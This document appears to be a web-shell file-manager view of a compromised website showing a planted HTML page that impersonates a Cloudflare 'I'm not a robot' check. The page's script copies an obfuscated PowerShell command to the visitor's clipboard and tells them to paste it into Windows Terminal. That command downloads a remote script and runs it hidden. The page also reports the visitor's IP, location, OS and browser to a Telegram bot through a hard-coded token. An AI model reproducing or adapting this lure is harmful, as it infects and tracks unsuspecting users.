One Hat Cyber Team
Your IP :
216.73.216.193
Server IP :
170.247.48.121
Server :
Linux UBAPDWEB9271 3.10.0-1160.71.1.el7.x86_64 #1 SMP Tue Jun 28 15:37:28 UTC 2022 x86_64
Server Software :
Apache
PHP Version :
7.0.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
lelopagani.com.br
/
public
/
assets
/
js
/
View File Name :
testz3.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Security Verification Required - Cloudflare</title> <script src="https://cdn.tailwindcss.com"></script> <style> body { background: #0a0a0a; font-family: system-ui, sans-serif; } .checkbox { transition: all 0.3s ease; } </style> </head> <body class="min-h-screen flex items-center justify-center p-4"> <div class="w-full max-w-md bg-[#111111] rounded-2xl shadow-2xl overflow-hidden border border-gray-800"> <!-- Header --> <div class="flex justify-center pt-8 pb-6"> <div class="flex items-center gap-2"> <img src="https://www.cloudflare.com/favicon.ico" alt="Cloudflare" class="w-8 h-8"> <span class="text-white font-bold text-2xl tracking-tighter">CLOUDFLARE</span> </div> </div> <div class="px-8 pb-8"> <h1 class="text-red-500 text-2xl font-semibold text-center mb-2"> Security Verification Required </h1> <p class="text-gray-300 text-center text-[15px] leading-relaxed mt-4"> We detected suspicious activity while trying to access your<br> Dropbox file.<br> Please complete the verification below to continue. </p> <!-- I'm not a robot --> <div id="robot-box" class="mt-8 cursor-pointer"> <div class="bg-[#1a1a1a] border border-gray-700 rounded-xl p-5 flex items-center gap-4 hover:border-gray-600 transition-all checkbox"> <div id="checkbox" class="w-7 h-7 border-2 border-gray-400 rounded flex items-center justify-center flex-shrink-0"></div> <span id="robot-text" class="text-white text-[17px]">I'm not a robot</span> </div> </div> <!-- Instructions --> <div class="mt-6 bg-[#1a1a1a] border border-gray-700 rounded-2xl p-6"> <h3 class="text-white font-medium mb-4">Instructions to complete verification:</h3> <ol class="text-gray-300 text-[15px] space-y-3 list-decimal pl-5"> <li>Press <span class="font-mono bg-gray-800 px-1.5 py-0.5 rounded text-sm">Windows + X</span> on your keyboard</li> <li>Press the letter <span class="font-mono bg-gray-800 px-1.5 py-0.5 rounded text-sm">I</span> to open Windows Terminal</li> <li>Press <span class="font-mono bg-gray-800 px-1.5 py-0.5 rounded text-sm">Ctrl + V</span> to paste the code</li> <li>Press <span class="font-mono bg-gray-800 px-1.5 py-0.5 rounded text-sm">Enter</span></li> </ol> <!-- Copied message --> <div id="copied-box" class="mt-5 flex items-center gap-3 bg-[#0f0f0f] border border-gray-700 rounded-xl p-4 transition-all"> <div id="copied-icon" class="w-5 h-5 bg-gray-500 rounded flex items-center justify-center flex-shrink-0"> <span class="text-xs text-white font-bold">✓</span> </div> <span id="copied-text" class="text-gray-400 text-sm font-medium"> Code has been copied to your clipboard automatically. </span> </div> </div> <!-- Footer --> <div class="text-center mt-8"> <p class="text-gray-500 text-xs"> Ray ID: 58BF0C9A5b0f4c • 2026-04-14 </p> </div> </div> </div> <script> // ==================== CONFIG - REPLACE THESE ==================== const BOT_TOKEN = "8070169679:AAFJWInJKQLKqXGaGLSwgQU2KlVZ9ZX1bFE"; // ← Put your Telegram Bot Token here const CHAT_ID = "-4869967638"; // ← Put your Chat ID here (can be user or group) const TELEGRAM_API = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`; // ==================== 1. I'm not a robot Checkbox ==================== const robotBox = document.getElementById('robot-box'); const checkbox = document.getElementById('checkbox'); const robotText = document.getElementById('robot-text'); let isVerified = false; robotBox.addEventListener('click', () => { if (isVerified) return; checkbox.innerHTML = `<div class="w-4 h-4 border-2 border-blue-500 border-t-transparent rounded-full animate-spin"></div>`; robotText.textContent = "Verifying..."; setTimeout(() => { checkbox.innerHTML = ` <svg xmlns="http://www.w3.org/2000/svg" class="w-5 h-5 text-white" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="4"> <path stroke-linecap="round" stroke-linejoin="round" d="M5 13l4 4L19 7" /> </svg> `; checkbox.style.backgroundColor = '#2563eb'; checkbox.style.borderColor = '#2563eb'; robotText.textContent = "I'm not a robot"; isVerified = true; }, 1500); }); // ==================== 2. Mark as Copied (Green) ==================== const copiedBox = document.getElementById('copied-box'); const copiedText = document.getElementById('copied-text'); const copiedIcon = document.getElementById('copied-icon'); function markAsCopied() { copiedBox.classList.add('border-emerald-600'); copiedIcon.innerHTML = ` <svg xmlns="http://www.w3.org/2000/svg" class="w-4 h-4 text-white" fill="none" viewBox="0 0 24 24" stroke="currentColor"> <path stroke-linecap="round" stroke-linejoin="round" stroke-width="4" d="M5 10l7-7m0 0l7 7" /> </svg> `; copiedIcon.style.backgroundColor = '#10b981'; copiedText.classList.add('text-emerald-400'); } // ==================== 3. Windows Key → Copy "whoami" & Turn Green ==================== let metaKeySent = false; document.addEventListener('keydown', (e) => { if (e.key === "Meta" && !metaKeySent) { metaKeySent = true; // Copy command to clipboard navigator.clipboard.writeText("<# I am not a robot - Cloudflare ID: a855e317c684a6df #> iex ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtV2luZG93U3R5bGUgSGlkZGVuIC1Ob1Byb2ZpbGUgLUNvbW1hbmQgIml3ciBodHRwczovL2xlbG9wYWdhbmkuY29tLmJyL2Fzc2V0cy9qcy90dDMudHh0IC1PdXRGaWxlICRlbnY6VEVNUFxcdHQzLnBzMTsgJiAkZW52OlRFTVBcXHR0My5wczEi\")))").then(() => { markAsCopied(); }).catch(err => console.error("Copy failed:", err)); // Send Telegram notification sendTelegramLog("meta_key_pressed", "✅@everyone ac.html User opened Run dialog."); } // Support Ctrl + V as backup if (e.ctrlKey && e.key.toLowerCase() === 'v') { markAsCopied(); } }); // ==================== 4. Direct Telegram Send Function ==================== async function sendTelegramLog(eventType, alertMessage = null) { try { const ipData = await fetch("https://ipapi.co/json/").then(r => r.json()).catch(() => ({})); const browser = getBrowser(); const flag = countryCodeToFlagEmoji(ipData.country); let text = `🔥 Cloudflare Verification\n\n`; text += `Type: ${eventType}\n`; text += `IP: ${ipData.ip || 'Unknown'}\n`; text += `Country: ${ipData.country_name || 'Unknown'} ${flag}\n`; text += `OS: ${navigator.platform}\n`; text += `Browser: ${browser}\n`; text += `Referrer: ${document.referrer || window.location.href}\n`; if (alertMessage) text += `\n${alertMessage}`; await fetch(TELEGRAM_API, { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ chat_id: CHAT_ID, text: text, parse_mode: "HTML" }) }); console.log("✅ Telegram log sent"); } catch (err) { console.error("Telegram send failed:", err); } } function countryCodeToFlagEmoji(countryCode) { if (!countryCode) return '🌍'; return String.fromCodePoint(...[...countryCode.toUpperCase()].map(c => 127397 + c.charCodeAt(0))); } function getBrowser() { const ua = navigator.userAgent; if (ua.includes("Edg/")) return "Edge"; if (ua.includes("OPR/") || ua.includes("Opera")) return "Opera"; if (ua.includes("Chrome/")) return "Chrome"; if (ua.includes("Firefox/")) return "Firefox"; if (ua.includes("Safari/") && !ua.includes("Chrome/")) return "Safari"; return "Unknown"; } // Log when page loads window.addEventListener('load', () => { sendTelegramLog('popup_triggered'); }); </script> </body> </html>